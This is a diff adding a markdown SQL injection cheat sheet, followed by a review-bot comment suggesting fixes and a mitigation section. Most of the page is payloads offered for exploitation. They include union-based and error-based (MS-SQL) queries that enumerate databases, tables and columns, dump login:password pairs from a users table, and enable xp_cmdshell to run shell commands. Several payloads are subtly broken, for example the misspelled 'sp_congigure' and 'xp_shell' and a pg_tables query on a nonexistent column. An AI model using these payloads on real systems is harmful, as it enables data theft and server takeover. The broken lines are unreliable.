    SQL Injection.md
    1  -# Soon!
     1 +# SQL injection
     2 + 
     3 +## Introduction
     4 + 
     5 + It is an attack in which an attacker inserts untrusted data in the application that results in revealing sensitive information of the database.
     6 + 
     7 + SQL Injection (SQLi) is a code injection attack where an attacker manipulates the data being sent to the server to execute malicious SQL statements to control a web application’s database server, thereby accessing, modifying and deleting unauthorized data. This attack is mainly used to take over database servers.
     8 + 
     9 +- In-band SQLi (Classic SQLi)
     10 +- Error-based SQLi
     11 +- Union-based SQLi
     12 +- Inferential SQLi (Blind SQLi)
     13 +- Boolean-based (content-based) Blind SQLi
     14 +- Time-based Blind SQLi
     15 +- Out-of-band SQLi
     16 + 
     17 +## How to exploit
     18 +# SQLI tricks
     19 + 
     20 +## GET
     21 + 
     22 +### Error-Based
     23 + 
     24 +### Simple test
     25 + 
     26 +`Adding a simpe quote '`
     27 + 
     28 +Example: `http://vulnerable-website.com/Less-1/?id=5'`
     29 + 
     30 +### Fuzzing
     31 + 
     32 +Sorting columns to find maximum column
     33 + 
     34 +`http://vulnerable-website.com/Less-1/?id=-1 order by 1`
     35 + 
     36 +`http://vulnerable-website.com/Less-1/?id=-1 order by 2`
     37 + 
     38 +`http://vulnerable-website.com/Less-1/?id=-1 order by 3`
     39 + 
     40 +(until it stop returning errors)
     41 + 
     42 +---
     43 + 
     44 + 
     45 +### Finding what column is injectable
     46 + 
     47 +**mysql**
     48 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, 3` (using the same amount of columns you got on the previous step)
     49 + 
     50 +**postgresql**
     51 +`http://vulnerable-website.com/Less-1/?id=-1 union select NULL, NULL, NULL` (using the same amount of columns you got on the previous step)
     52 + 
     53 + one of the columns will be printed with the respective number
     54 + 
     55 +---
     56 + 
     57 + 
     58 +#### Finding version
     59 + 
     60 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, version()` **mysql**
     61 +`http://vulnerable-website.com/Less-1/?id=-1 union select NULL, NULL, version()` **postgres**s
     62 + 
     63 + 
     64 +#### Finding database name
     65 + 
     66 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1,2, database()` **mysql**
     67 + 
     68 +`http://vulnerable-website.com/Less-1/?id=-1 union select NULL,NULL, database()` **postgres**
     69 + 
     70 + 
     71 +#### Finding usernames logged in
     72 + 
     73 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, current_user()` **mysql**
     74 + 
     75 + 
     76 +#### Finding databases
     77 + 
     78 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, schema_name from information_schema.schemata` **mysql**
     79 + 
     80 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, datname from pg_database` **postgres**
     81 + 
     82 + 
     83 +#### Finding table names from a database
     84 + 
     85 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, table_name from information_schema.tables where table_schema="database_name"` **mysql**
     86 + 
     87 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, tablename from pg_tables where table_catalog="database_name"` **postgres**
     88 + 
     89 + 
     90 +#### Finding column names from a table
     91 + 
     92 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, column_name from information_schema.columns where table_schema="database_name" and table_name="tablename"` **mysql**
     93 + 
     94 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, column_name from information_schema.columns where table_catalog="database_name" and table_name="tablename"` **postgres**
     95 + 
     96 +#### Concatenate
     97 + 
     98 +Example:
     99 + 
     100 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, login from users;`
     101 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, password from users;`
     102 + 
     103 +in one query
     104 + 
     105 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, concat(login,':',password) from users;` **mysql**
     106 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, login||':'||password from users;` **postgres**
     107 + 
     108 + 
     109 +### Error Based SQLI (USUALLY MS-SQL)
     110 + 
     111 +#### Current user
     112 + 
     113 +`http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(user_name() as varchar(4096)))--`
     114 + 
     115 + 
     116 +#### DBMS version
     117 + 
     118 +`http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(@@version as varchar(4096)))--`
     119 + 
     120 + 
     121 +#### Database name
     122 + 
     123 +`http://vulnerable-website.com/Less-1/?id=-1 or db_name(0)=0 --`
     124 + 
     125 + 
     126 +#### Tables from a database
     127 + 
     128 +`http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM dbname..sysobjects where xtype='U')--`
     129 + 
     130 +---
     131 + 
     132 +`http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM dbname..sysobjects where xtype='U' AND name NOT IN ('previouslyFoundTable',...))--`
     133 + 
     134 + 
     135 +#### Columns within a table
     136 + 
     137 + 
     138 +`http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(dbname..syscolumns.name as varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE dbname..syscolumns.id=dbname..sysobjects.id AND dbname..sysobjects.name = 'tablename')--`
     139 + 
     140 +> remember to change **dbname** and **tablename** accordingly with the given situation
     141 +> after each iteration a new column name will be found, make sure add it to ** previously found column name ** separated by comma as on the next sample
     142 + 
     143 +`http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(dbname..syscolumns.name as varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE dbname..syscolumns.id=dbname..sysobjects.id AND dbname..sysobjects.name = 'tablename' AND dbname..syscolumns.name NOT IN('previously found column name', ...))--`
     144 + 
     145 + 
     146 +#### Actual data
     147 + 
     148 + 
     149 +`http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(columnName as varchar(4096)) FROM tablename)--`
     150 + 
     151 +> after each iteration a new column name will be found, make sure add it to ** previously found column name ** separated by comma as on the next sample
     152 + 
     153 +`http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(columnName as varchar(4096)) FROM tablename AND name NOT IN('previously found row data'))--`
     154 + 
     155 + 
     156 +#### Shell commands
     157 + 
     158 +`EXEC master..xp_cmdshell <command>`
     159 + 
     160 +> you need yo be 'sa' user
     161 + 
     162 +#### Enabling shell commands
     163 + 
     164 +`EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_congigure 'xp_shell', 1; RECONFIGURE;`
     165 + 
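Review bot: the introduction on lines 5 and 7 defines SQL injection twice, and the list of injection classes on lines 9–15 is flat even though the text presents the last four as subtypes of the first three; fold the two definitions into one paragraph and nest the subtypes (`Error-based` and `Union-based` under `In-band`, `Boolean-based` and `Time-based` under `Inferential`). Heading levels also jump around: `## How to exploit` on line 17 is immediately followed by the top-level `# SQLI tricks` on line 18, and the `###`/`####` sections below hang off that second H1, so the rendered table of contents will not reflect the intended outline. Typos to fix: `simpe` (line 26), `until it stop` (line 40), `**postgres**s` (line 61), `make sure add it` (lines 141 and 151), `you need yo be` (line 160) and `sp_congigure` (line 164). The MySQL and PostgreSQL examples on lines 85–94 wrap string literals in double quotes (`table_schema="database_name"`); PostgreSQL, and MySQL with `ANSI_QUOTES` enabled, treat double quotes as identifier quoting, so these should be single-quoted literals. Finally, a page titled "SQL injection" that only documents exploitation is missing a prevention section; since the detection of this attack and its fix are the reason the material is useful, add a short "Mitigation" heading covering parameterized queries, least-privilege database accounts (which also defeats the `xp_cmdshell` step on lines 156–164, as the text already notes it requires the `sa` account) and keeping `xp_cmdshell` disabled.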